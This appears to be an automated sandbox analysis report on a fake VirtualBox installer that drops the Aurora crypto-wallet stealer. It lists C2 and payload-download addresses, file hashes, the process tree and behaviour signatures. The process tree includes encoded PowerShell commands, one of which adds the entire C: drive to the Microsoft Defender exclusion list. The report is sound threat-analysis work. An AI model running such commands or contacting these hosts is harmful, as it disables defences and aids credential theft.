Analysis

  • max time kernel
    172s
  • max time network
    188s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15/12/2022, 17:16 UTC

General

  • Target

    VirtualBox-7.0.2-154219-Win/VirtualBox-7.0.2-154219-Win.exe

  • Size

    677.9MB

  • MD5

    670e50d1d17dce3d446919680dd657f0

  • SHA1

    fdbba6ab2df85337f8fefec7da04323ba6e42107

  • SHA256

    7f43dee28fdf815aca5367694540bcd514c2ad9c1a4c4bc645286403fffb4123

  • SHA512

    ed31879ce1867b31b9f0868ff797ec92dfb5284381bada666636ff07eb9b4221f60a9fb549984d0b3272e619674031431c7498451ded735ad98de4db5a53e2ba

  • SSDEEP

    3072:eahKyd2n31yS5LvfiP1yaX3KmC5wBCgBCwfjL1c1pcSsP1XBRWf9z:eahOcnHn9BF//1cUJU

Malware Config

Extracted

Family

aurora

C2

79.137.206.138:8081

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\VirtualBox-7.0.2-154219-Win\VirtualBox-7.0.2-154219-Win.exe
    "C:\Users\Admin\AppData\Local\Temp\VirtualBox-7.0.2-154219-Win\VirtualBox-7.0.2-154219-Win.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3596
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
        (the -ENC argument is UTF-16LE base64 and decodes to: start-sleep -seconds 35)
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:644
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
        (the -ENC argument is UTF-16LE base64 and decodes to: set-mppreference -exclusionpath C:\ , i.e. it adds the whole C: drive to the Microsoft Defender exclusion list)
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4740
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4656
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4588
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3396
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C "wmic path win32_VideoController get name"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3528
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4304
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C "wmic cpu get name"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1812
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic cpu get name
            5⤵
            PID:3676

    Network

    • DNS
      wyndellribeiro.com.br
      BUSINE~3.EXE
      Remote address:
      8.8.8.8:53
      Request
      wyndellribeiro.com.br
      IN A
      Response
      wyndellribeiro.com.br
      IN A
      162.241.203.136
    • GET
      https://wyndellribeiro.com.br/wp-admin/images/bo/Hsujyzmg.png
      BUSINE~3.EXE
      Remote address:
      162.241.203.136:443
      Request
      GET /wp-admin/images/bo/Hsujyzmg.png HTTP/1.1
      Host: wyndellribeiro.com.br
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 15 Dec 2022 17:18:21 GMT
      Server: Apache
      Upgrade: h2,h2c
      Connection: Upgrade, Keep-Alive
      Last-Modified: Thu, 08 Dec 2022 16:53:59 GMT
      Accept-Ranges: bytes
      Content-Length: 3319296
      Keep-Alive: timeout=5, max=75
      Content-Type: image/png
    • DNS
      164.2.77.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      164.2.77.40.in-addr.arpa
      IN PTR
      Response
    • 104.18.10.207:443
      tls
      138 B
      183 B
      3
      3
    • 104.18.7.145:443
      tls
      92 B
      143 B
      2
      2
    • 93.184.220.29:80
      322 B
      7
    • 20.189.173.10:443
      322 B
      7
    • 8.238.110.126:80
      322 B
      7
    • 162.241.203.136:443
      https://wyndellribeiro.com.br/wp-admin/images/bo/Hsujyzmg.png
      tls, http
      BUSINE~3.EXE
      102.4kB
      3.4MB
      1696
      2468

      HTTP Request

      GET https://wyndellribeiro.com.br/wp-admin/images/bo/Hsujyzmg.png

      HTTP Response

      200
    • 79.137.206.138:8081
      BUSINE~3.EXE
      1.0MB
      8.3kB
      767
      207
    • 8.8.8.8:53
      wyndellribeiro.com.br
      dns
      BUSINE~3.EXE
      67 B
      83 B
      1
      1

      DNS Request

      wyndellribeiro.com.br

      DNS Response

      162.241.203.136

    • 8.8.8.8:53
      164.2.77.40.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      164.2.77.40.in-addr.arpa

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      6195a91754effb4df74dbc72cdf4f7a6

      SHA1

      aba262f5726c6d77659fe0d3195e36a85046b427

      SHA256

      3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

      SHA512

      ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      06ad34f9739c5159b4d92d702545bd49

      SHA1

      9152a0d4f153f3f40f7e606be75f81b582ee0c17

      SHA256

      474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

      SHA512

      c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      4bb93f9fe7158d24597b3a06abbe2994

      SHA1

      5f2cb8edd8f2714059f13d24b7bf84c45d1681aa

      SHA256

      427f3eb6d3c11be4c6d4fe96196c972488d53cc84753580223132f8e7ef09d00

      SHA512

      163fb53001b3677fc57f8877eb241cab73e09cb17c6964fa1560639f7f98cfb6d3e78ae7233f892ba443325678b3e2242179ae1d168ce0e7504f91d9f94ca129

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE

      Filesize

      362.6MB

      MD5

      b57fd565047f69ed9031fe35607bc4de

      SHA1

      a34dcacc6f1915d500d8643a5e9e9b23f6c2eec1

      SHA256

      e7297f5162728d2282bd88f80583bd88d3075f0fbabd7568014a40e856aaa81a

      SHA512

      d9917bf7b8b396324cd0f77335b2fc8b5022376d646c06846e0a6c9f0908e5d4030443188913d6a9e0b1f6f763d8c9330c74d33edb55ee59690a2b5eabb64cd4

    • memory/644-144-0x0000000005200000-0x0000000005266000-memory.dmp

      Filesize

      408KB

    • memory/644-147-0x0000000006330000-0x000000000634A000-memory.dmp

      Filesize

      104KB

    • memory/644-141-0x0000000002540000-0x0000000002576000-memory.dmp

      Filesize

      216KB

    • memory/644-142-0x0000000005340000-0x0000000005968000-memory.dmp

      Filesize

      6.2MB

    • memory/644-143-0x0000000005120000-0x0000000005186000-memory.dmp

      Filesize

      408KB

    • memory/644-146-0x0000000007500000-0x0000000007B7A000-memory.dmp

      Filesize

      6.5MB

    • memory/644-145-0x0000000005E40000-0x0000000005E5E000-memory.dmp

      Filesize

      120KB

    • memory/3596-138-0x00000000058D0000-0x00000000058DA000-memory.dmp

      Filesize

      40KB

    • memory/3596-139-0x0000000008FD0000-0x0000000008FF2000-memory.dmp

      Filesize

      136KB

    • memory/3596-137-0x0000000005950000-0x00000000059E2000-memory.dmp

      Filesize

      584KB

    • memory/3596-136-0x0000000005F00000-0x00000000064A4000-memory.dmp

      Filesize

      5.6MB

    • memory/3596-135-0x0000000000F00000-0x0000000000F40000-memory.dmp

      Filesize

      256KB

    • memory/4588-152-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4588-155-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4588-173-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4588-172-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4588-157-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4656-162-0x0000000006230000-0x000000000624E000-memory.dmp

      Filesize

      120KB

    • memory/4656-163-0x0000000007060000-0x000000000706A000-memory.dmp

      Filesize

      40KB

    • memory/4656-166-0x0000000007290000-0x0000000007326000-memory.dmp

      Filesize

      600KB

    • memory/4656-169-0x0000000005B60000-0x0000000005B6E000-memory.dmp

      Filesize

      56KB

    • memory/4656-170-0x00000000071F0000-0x000000000720A000-memory.dmp

      Filesize

      104KB

    • memory/4656-171-0x00000000071D0000-0x00000000071D8000-memory.dmp

      Filesize

      32KB

    • memory/4656-161-0x00000000754D0000-0x000000007551C000-memory.dmp

      Filesize

      304KB

    • memory/4656-160-0x0000000006250000-0x0000000006282000-memory.dmp

      Filesize

      200KB
